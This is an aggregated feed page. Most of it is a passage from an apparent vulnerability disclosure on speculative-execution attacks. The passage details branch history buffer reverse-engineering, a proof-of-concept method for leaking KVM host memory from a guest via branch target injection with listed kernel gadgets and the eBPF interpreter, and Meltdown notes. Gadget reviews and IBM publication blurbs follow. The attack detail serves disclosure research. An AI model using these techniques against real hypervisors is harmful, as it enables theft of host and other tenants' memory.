The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.
The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):
void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {  *bhb_state <<= 2;  *bhb_state ^= (dst & 0x3f);  *bhb_state ^= (src & 0xc0) >> 6;  *bhb_state ^= (src & 0xc00) >> (10 - 2);  *bhb_state ^= (src & 0xc000) >> (14 - 4);  *bhb_state ^= (src & 0x30) << (6 - 4);  *bhb_state ^= (src & 0x300) << (8 - 8);  *bhb_state ^= (src & 0x3000) >> (12 - 10);  *bhb_state ^= (src & 0x30000) >> (16 - 12);  *bhb_state ^= (src & 0xc0000) >> (18 - 14);}
Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.
The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).Reverse-Engineering Branch Predictor InternalsThis subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.
We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)
We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.
Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.
In this test, the injection success rate was above 99%, giving us a base setup for future experiments.


We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.
To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.
The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.
Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).
Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.
However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of information probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).


If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]
With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.Reading host memory from a KVM guestLocating the host kernelOur PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:
  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.
In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.
The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.


With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.
At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.
kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.
To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.
Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux  are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.
The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.Identifying cache setsThe PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].Locating the host-virtual address of a guest pageBecause this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.
The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.
We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.
The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.
To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.
To brute-force the physical address, the following gadget can be used:
ffffffff810a9def:       4c 89 c0                mov    rax,r8ffffffff810a9df2:       4d 63 f9                movsxd r15,r9dffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]ffffffff810a9dfc:       81 ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]ffffffff810a9e08:       00
This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.Cache set selectionTo select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.Leaking dataAt this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.
The eBPF interpreter entry point has the following function signature:
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.
The eBPF interpreter provides, among other things:
  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:
ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]
Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.Variant 3: Rogue data cache loadBasically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/
In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.
We do have a few additions to make to Anders Fogh's blogpost:
"Imagine the following instruction executed in usermodemov rax,[somekernelmodeaddress]It will cause an interrupt when retired, [...]"
It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.
"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."
When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?
"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."
That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.Ideas for further researchWe believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.Leaking without data cache timingIt would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.Other microarchitecturesOur research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.Other JIT enginesWe developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.More efficient scanning for host-virtual addresses and cache setsIn variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.
The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.Dumping the complete BTB stateGiven that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.
The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.
This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.Variant 2: Leaking with more efficient gadgetsIf sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2. Various speedupsIn particular the variant 2 PoC is still a bit slow. This is probably partly because:
  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.Leaking or injection through the return predictorIf the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).
However, we have not performed any experiments with the return predictor that yielded conclusive results so far.Leaking data out of the indirect call predictorWe have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.Vendor statementsThe following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:IntelNo current statement provided at this time.AMDNo current statement provided at this time.ARMArm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.
Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update
Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.LiteratureNote that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to it may not reflect the latest version of Intel's documentation.
  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • "Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
    • "Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
    • "Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
    • "if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
    • "Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
  • https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.
References[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh's work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.[2] The precise model names are listed in the section "Tested Processors". The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.[4] This PoC won't work on CPUs with SMAP support; however, that is not a fundamental limitation.[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available at http://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpg, Release, Packages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.[6] The phone was running an Android build from May 2017.[7] https://software.intel.com/en-us/articles/intel-sdm[8] https://software.intel.com/en-us/articles/avoiding-and-identifying-false-sharing-among-threads, section "background"[9] More than 215 mappings would be more efficient, but the kernel places a hard cap of 216 on the number of VMAs that a process can have.[10] Intel's optimization manual states that "In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor", so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn't seem likely.[11] In case the history buffer was a bit bigger than we had measured, we added some margin - in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn't a very round number.[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.
Categories: Security

Leveraging Integrated Cryptographic Service Facility

IBM Redbooks Site - Wed, 01/03/2018 - 08:30
Redpaper, published: Wed, 3 Jan 2018

Integrated Cryptographic Service Facility (ICSF) is a part of the IBM® z/OS® operating system that provides cryptographic functions for data security, data integrity, personal identification, digital signatures, and the management of cryptographic keys.

Categories: Technology

Review: Anker PowerLine+ II versus PowerLine+ -- high quality nylon USB to Lightning cords

iPhone J.D. - Wed, 01/03/2018 - 00:34

Last year, I reviewed the Anker PowerLine+ USB to Lightning cord, and I was incredibly impressed.  It costs less than the cord that Apple sells (or includes with an iPhone or iPad), and it is far more durable.  Indeed, shortly after I purchased that cord, two of the Apple Lightning cords that some of my family members had been using started to fray near the ends.  Rather than risk damage to their iPhones, those cords went right into the trash and I decided order some more Anker cords from Amazon.  We got different colors for different family members to avoid confusion, and this also gave me an opportunity to compare the difference between the original version of the Anker PowerLine+ and the Anker PowerLine+ II. 

Durability

The PowerLine+ I have been using for months seems incredibly durable.  The nylon surrounding the cord protects the cord and makes it virtually impossible to knot the cord.  And the plugs on the ends seem much more durable than the Apple Lightning cords — which always seem to be the spot where my Apple cords fray over time.

The PowerLine+ II cord also features nylon surrounding the cord, but it is just a hair thicker.  And the plugs on the ends of the PowerLine+ II are a little bit larger and are more tapered than the PowerLine+ cord.  In the following picture, the Lightning end of the PowerLine+ II is at the top, followed by the Lightning end of the PowerLine+, then the USB end of the PowerLine+ II, and at the bottom the USB end of the PowerLine+.

What difference does this make?  Anker advertises the PowerLine+ as lasting 6 times longer than other (unspecified) Lightning cables with a 6,000+ bend lifespan.  Anker advertises the PowerLine+ II as lasting 30 times longer than ordinary cables, able to withstand 30,000 bends.  So apparently Anker believes that the PowerLine+ II is about five times more durable than the PowerLine+ cord.  Anker says that both cords have a tensile strength that can support 175 pounds.

The PowerLine+ comes with an 18 month warranty, but the PowerLine+ II comes with a lifetime warranty.  Anker's website says:  "We're so confident in PowerLine+ II, we are offering a hassle-free replacement for all quality issues.  Not for half a year, not for 18 months, but for an entire lifetime.  It's the only cable you will ever need to buy."

I haven't tried to bend any of these cords 6,000 times, let alone 30,000 times.  I have tried to see what is different between the cords, and I see a few minor differences.  First, the nylon on the PowerLine+ II is thicker and feels a little softer than the PowerLine+.  Second, if I bend the PowerLine+, the cord tends to keep the shape of the bend, but if I bend the PowerLine+ II, the cord doesn't keep the shape as much.  I don't know if either of those two qualities has anything to do with durability.

I'm sure that the longer plugs on the PowerLine+ II are important for durability.  Since that is a common point of failure for the Apple Lightning cords, I can understand that Anker would want to make them as strong as possible.

Speaking of the plugs, keep in mind that — as I noted in my prior review — the Lightning end of the Anker plugs are slightly larger than the Lightning end of Apple's cord.  If you have an iPhone case with a tiny hole for the Lightning cord made precisely for the Apple cord, it is possible that the Anker plug will be too big.  Otherwise, I doubt you will notice the difference.

Colors

The PowerLine+ cords come in four colors:  gray, red, white and golden.  I bought my original PowerLine+ cord for my car, and the dark gray color is a great match for my car's interior.  My wife picked the red color for her cord, and the red does look really nice.  Here are the gray and red colors:

The PowerLine+ II cords come in four colors:  black, red, silver and golden.  Here are the black, silver and golden colors:

The gray of the PowerLine+ is dark enough that it is only a shade lighter than the black of the PowerLine+ II.  The following picture shows all five cords, with the gray PowerLine+ at the top and the black PowerLine+ II in the middle:

Cases

One big difference between the two products is that the PowerLine+ comes with a felt pouch that folds over, whereas the PowerLine+ II comes with a nicer zippered pouch.  Here is the felt pouch for the PowerLine+:

Here is the pouch of the PowerLine+ II, the 3 foot version on the left, and the slightly larger 6 foot version on the right:

With both cases, you can wind up the cord inside of the case to make the part of the cords that come out of each side just the length that you need.  This works with the leather pouch because both ends are open; this works with the zippered pouch because it has zippers at both ends. 

I think that most people would prefer the zippered pouch because it zips completely closed.  Both cases give you someplace to store the cord when you are not using it, but the PowerLine+ II version seems like a nicer case to toss into your purse, briefcase, luggage, etc.

Price difference

Typically, the PowerLine+ II cord costs $1 or $2 more than the same length PowerLine+ cord.  But this isn't always true.

You can buy these cords in 1 foot, 3 foot, 6 foot and 10 foot lengths.  The cost for the PowerLine+ versions are $12.99, $14.99, $16.99 and $17.99.  For the same length versions of the PowerLine+ II, the prices are $13.99, $15.99, $17.99 and $19.99.  But those prices can vary, both on Amazon and the Anker website.

Also, if you like the red color, the PowerLine+ can be even cheaper than the PowerLine+ II because Anker offers a two-pack:  two 3 foot cords for $19.99, or two 6 foot cords for $21.99.  And even if you just want a single red cord, as I type this, the 3 foot red cord is currently $13.99 ($1 cheaper) on Amazon and $11.99 on Anker's website.  I don't know if red is always cheaper or if there are other times in which another color is cheaper.

My recommendation

If you decide that you are ready to get a high-quality Lightning cable, these nylon-coated Anker cables get my very highest recommendation.  If you find that for the price and color that you want, the PowerLine+ II version is only $1 or $2 more, you might as well get the PowerLine+ II version.  Even to my eyes, the II version appears to be a little more durable, and Anker apparently thinks the difference is enough to offer the lifetime warranty with the II version.  Plus, the case is much nicer with the II version, which is something that you will notice right away.

But if you find that the price difference is more substantial, opting for the PowerLine+ version is still a fine choice.  When I purchased my new cords, I took advantage of the discount on the red PowerLine+ two-pack, which meant that I spent $11 on each red 6 foot cord versus $16 for a red PowerLine+ II version.  I'd make that same decision again.  For me, the nicer case and the increase in durability for a product that is already very durable isn't worth another $5 for each red cord. 

Here are links to the sizes and prices I'm seeing on Amazon right now:

PowerLine+ 1 foot ($12.99)

PowerLine+ II 1 foot ($13.99)

PowerLine+ 3 foot ($14.99); red PowerLine+ 3 foot ($13.99)

PowerLine+ 3 foot red two-pack ($19.99)

PowerLine+ II 3 foot ($15.99)

PowerLine+ 6 foot ($16.99)

PowerLine+ 6 foot red two-pack ($21.99)

PowerLine+ II 6 foot ($17.99)

PowerLine+ 10 foot ($17.99)

PowerLine+ II 10 foot ($19.99)

Categories: iPhone Web Sites

Face ID tip for non-recognition

iPhone J.D. - Mon, 01/01/2018 - 22:30

I'm a big fan of Face ID on the iPhone X.  It is a big improvement over the Touch ID fingerprint identification system on other iPhone models because, when it works, it provides security without any inconvenience at all.  You are looking at your iPhone anyway when you pick it up to use it, and then Face ID unlocks the phone, almost as if you didn't even have a passcode at all.  In an excellent recent article on the iPhone X, John Gruber of Daring Fireball described it this way:

Consider the aforementioned process of opening a notification from the lock screen. Touch ID adds an extra step, every time, even when it works perfectly. Face ID is not perfect — it’s true that I wind up either authenticating a second time or resorting to entering my PIN more often than with Touch ID — but it only adds these extra steps when it fails for some reason. When it works perfectly, which for me is the vast majority of the time, the effect is sublime. It really does feel like my iPhone has no passcode protecting it. That was never true for Touch ID. Touch ID feels like a better way to unlock your device. Face ID feels like your device isn’t even locked.

Unfortunately, as Gruber noted, the current generation of Face ID fails more often than Touch ID fails.  Here is a tip I recently figured out (just by dumb luck) for dealing with Face ID when it does fail.

If Face ID fails on the Lock screen, you are presented with a keypad to type in a number of password.  If you want to try Face ID again, I previously thought that the only way to to do was to press the cancel button and start all over again. 

Here is a better way.  If you turn your iPhone away from your face for just a second — so that the Face ID camera is looking at something else — and then you turn it back towards your face, I find that Face ID works the second time almost 100% of the time.  This saves you the trouble of pressing that cancel button and starting over again.  Just slightly rotate your wrist, turn it back, and you are done.

This also works with apps that use Face ID as an alternative to typing a username and password.  If Face ID fails, you will see a message like this one with the option to tap an on-screen button to Try Face ID Again:

But you can ignore that button.  Just turn the iPhone away from your face, then bring it back, and Face ID will see you without you having to touch the screen at all.  You'll see the green happy face, and then the app will unlock.

Since I started using this method, the relatively rare instances in which Face ID fails have become far less annoying for me.

Categories: iPhone Web Sites

IBM zPDT 2017 Sysplex Extensions

IBM Redbooks Site - Sat, 12/30/2017 - 08:30
Draft Redbook, last updated: Sat, 30 Dec 2017

This IBM® Redbooks® publication describes the IBM System z® Personal Development Tool (IBM zPDT®) 2017 Sysplex Extensions, which is a package that consists of sample files and supporting documentation to help you get a functioning, data sharing sysplex up and running with minimal time and effort.

Categories: Technology

Using IBM DS8000 in an OpenStack Environment

IBM Redbooks Site - Thu, 12/28/2017 - 08:30
Redpaper, published: Thu, 28 Dec 2017

With the availability of the IBM® Storage Driver for OpenStack, the IBM DS8000® can offer a range of capabilities that enable more effective storage automation deployments to private or public clouds.

Categories: Technology

Pages

Subscribe to www.hdgonline.net aggregator